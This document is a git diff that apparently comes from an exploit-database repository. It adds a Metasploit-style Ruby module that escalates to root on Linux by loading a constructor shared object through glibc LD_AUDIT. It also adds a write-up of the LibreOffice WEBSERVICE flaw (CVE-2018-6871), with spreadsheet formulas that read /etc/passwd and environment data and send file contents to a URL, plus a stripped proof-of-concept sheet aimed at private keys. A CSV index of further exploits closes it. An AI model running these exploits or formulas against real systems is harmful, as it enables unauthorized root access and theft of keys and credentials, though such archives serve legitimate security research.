+ void init(void) __attribute__((constructor));
+
+ void __attribute__((constructor)) init() {
+ setuid(0);
+ setgid(0);
+ system("#{payload_path}");
+ }
+ |
+
+ begin
+ so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
+ rescue
+ print_error "Metasm encoding failed: #{$ERROR_INFO}"
+ elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
+ elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}"
+ fail_with Failure::Unknown, 'Metasm encoding failed'
+ end
+
+ # Upload shared object
+ so_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ so_path = "#{base_dir}/#{so_name}"
+ upload_and_chmodx so_path, so
+
+ # Upload exploit
+ @so_path = "#{@lib_dir}/#{so_name}.so"
+ exp = %(
+ umask 0
+ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="#{@so_path}" #{suid_exe_path} 2>/dev/null
+ umask 0022
+ cat #{so_path} > #{@so_path}
+ LD_AUDIT="#{so_name}.so" #{suid_exe_path}
+ echo > #{@so_path}
+ )
+ exp_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ exp_path = "#{base_dir}/#{exp_name}"
+ upload_and_chmodx exp_path, exp
+
+ # Upload payload
+ upload_and_chmodx payload_path, generate_payload_exe
+
+ # Launch exploit
+ print_status 'Launching exploit...'
+ # The echo at the end of the command is required
+ # else the original session may die
+ output = cmd_exec "#{exp_path}& echo "
+ output.each_line { |line| vprint_status line.chomp }
+ end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/44022.md b/exploits/linux/remote/44022.md
new file mode 100644
index 000000000..8e81957f0
--- /dev/null
+++ b/exploits/linux/remote/44022.md
@@ -0,0 +1,396 @@
+# Vulnerability description
+
+[CVE-2018-6871](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6871)
+
+## First part
+
+LibreOffice supports COM.MICROSOFT.WEBSERVICE function:
+
+ https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4
+
+The function is required to obtain data by URL, usually used as:
+
+ =FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")
+
+In original:
+
+ For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.
+
+In LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1.
+
+## Second part
+
+By default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document.
+
+# Exploitation
+
+To read file you need just:
+
+ =WEBSERVICE("/etc/passwd")
+
+This function can also be used to send a file:
+
+ =WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))
+
+For successful operation, you need to send the files of the current user, so you need to retrieve current user home path.
+
+ =MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",
+
+Also you can parse other files too, like a ~/.ssh/config or something like that.
+
+For other than LibreOffice Calc formats you just need embed calc object to other document (I checked it works).
+
+# Impact
+
+It is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, affect LibreOffice prior to 5.4.5/6.0.1 in all operation systems (GNU/Linux, MS Windows, macOS etc.) and may be embedded in almost all formats supporting by LO.
+
+# Acknowledgment
+
+Vulnerability was independently found by me (@jollheef) and Ronnie Goodrich && Andrew Krasichkov (according to LibreOffice team notes).
+
+ - - -
+
+# poc.fods
+
+```
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Proof-of-concept: send private keys (this cells of course must be moved and set color to white)
+
+
+
+
+
+
+
+
+
+ Current user:
+
+
+ #VALUE!
+
+
+ 689
+
+
+ 676
+
+
+ #VALUE!
+
+
+ (change this)Address:
+
+
+ http://localhost:8080
+
+
+
+
+
+ List of private keys:
+
+
+
+
+ #VALUE!
+
+
+
+ Send:
+
+
+
+
+
+
+ 0 (default path)
+
+
+
+
+
+
+ #VALUE!
+
+
+
+
+
+ 1
+
+
+
+
+
+ 132
+
+
+ 109
+
+
+ 96
+
+
+
+ #VALUE!
+
+
+
+
+
+ 2
+
+
+
+
+
+ 297
+
+
+ 259
+
+
+ 246
+
+
+
+ #VALUE!
+
+
+
+
+
+ 3
+
+
+
+
+
+ 436
+
+
+ 409
+
+
+ 396
+
+
+
+ #VALUE!
+
+
+
+
+
+ 4
+
+
+
+
+
+ 586
+
+
+ 563
+
+
+ 550
+
+
+
+ #VALUE!
+
+
+
+
+
+ 5
+
+
+
+
+
+ 718
+
+
+ 695
+
+
+ 682
+
+
+
+ #VALUE!
+
+
+
+
+
+ 6
+
+
+
+
+
+ 882
+
+
+ 860
+
+
+ 847
+
+
+
+ #VALUE!
+
+
+
+
+
+ 7
+
+
+
+
+
+ 1267
+
+
+ 1240
+
+
+ 1227
+
+
+
+ #VALUE!
+
+
+
+
+
+ 8
+
+
+
+
+
+ 1408
+
+
+ 1383
+
+
+ 1370
+
+
+
+ #VALUE!
+
+
+
+
+
+ 9
+
+
+
+
+
+ #VALUE!
+
+
+ #VALUE!
+
+
+ #VALUE!
+
+
+
+ #VALUE!
+
+
+
+
+
+
+
+```
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ab2480fdb..4bc031f83 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -9321,6 +9321,9 @@ id,file,description,date,author,type,platform,port
43979,exploits/linux/local/43979.py,"BOCHS 2.6-5 - Local Buffer Overflow",2018-02-05,"Juan Sacco",local,linux,
43987,exploits/windows/local/43987.c,"MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation",2018-02-07,"Souhail Hammou",local,windows,
44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple,
+44023,exploits/linux/local/44023.rb,"Juju-run Agent - Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
+44024,exploits/linux/local/44024.rb,"glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
+44025,exploits/linux/local/44025.rb,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@@ -16009,6 +16012,7 @@ id,file,description,date,author,type,platform,port
44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,
44005,exploits/multiple/remote/44005.py,"HPE iLO 4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple,
44009,exploits/multiple/remote/44009.c,"JBoss 4.2.x/4.3.x - Information Disclosure",2018-02-10,JameelNabbo,remote,multiple,
+44022,exploits/linux/remote/44022.md,"LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure",2018-02-10,"Mikhail Klementev",remote,linux,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
@@ -38025,6 +38029,9 @@ id,file,description,date,author,type,platform,port
44016,exploits/php/webapps/44016.txt,"Multi Language Olx Clone Script - Cross-Site Scripting",2018-02-10,"Varun Bagaria",webapps,php,
44017,exploits/php/webapps/44017.txt,"Paypal Clone Script 1.0.9 - 'id' / 'acctype' SQL Injection",2018-02-11,L0RD,webapps,php,
44018,exploits/php/webapps/44018.txt,"Readymade Video Sharing Script 3.2 - 'search' SQL Injection",2018-02-11,"Varun Bagaria",webapps,php,
+44019,exploits/java/webapps/44019.txt,"LogicalDOC Enterprise 7.7.4 - Directory Traversal",2018-02-12,LiquidWorm,webapps,java,
+44020,exploits/java/webapps/44020.txt,"LogicalDOC Enterprise 7.7.4 - User Enumeration",2018-02-12,LiquidWorm,webapps,java,
+44021,exploits/java/webapps/44021.txt,"LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution",2018-02-12,LiquidWorm,webapps,java,
41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80